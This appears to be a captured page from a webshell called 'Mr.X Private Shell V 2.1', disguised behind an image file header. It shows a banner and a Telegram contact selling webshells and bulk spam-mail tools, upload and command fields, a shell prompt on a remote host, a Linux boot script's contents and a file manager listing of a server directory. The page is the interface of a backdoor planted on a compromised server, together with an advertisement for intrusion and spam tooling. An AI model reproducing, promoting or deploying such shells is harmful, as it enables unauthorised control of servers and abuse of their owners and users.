����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# especially for Ubuntu 14.04 the udevd does not create the SCSI devices under /dev
[[ ! -x /bin/MAKEDEV ]] && return
cd /dev
# check the devices seen in /sys/block
ls /sys/block | grep -v -e loop -e ram | while read DEV
do
    # DEV can be sda, sr, ...
    DEV=$( echo $DEV | tr -s -d '[:digit:]' '' ) # remove digits
    [[ -b $DEV ]] && continue
    echo "MAKEDEV $DEV"
    MAKEDEV $DEV
done
cd /


Filemanager

Name Type Size Permission Actions
00-functions.sh File 1.1 KB 0644
01-run-ldconfig.sh File 140 B 0644
10-console-setup.sh File 2.21 KB 0644
20-check-boot-options.sh File 930 B 0644
40-start-udev-or-load-modules.sh File 3.45 KB 0644
41-load-special-modules.sh File 1.32 KB 0644
42-engage-scsi.sh File 254 B 0644
45-serial-console.sh File 779 B 0644
55-migrate-network-devices.sh File 14.33 KB 0644
58-start-dhclient.sh File 1.82 KB 0644
65-sysctl.sh File 149 B 0644
99-makedev.sh File 401 B 0644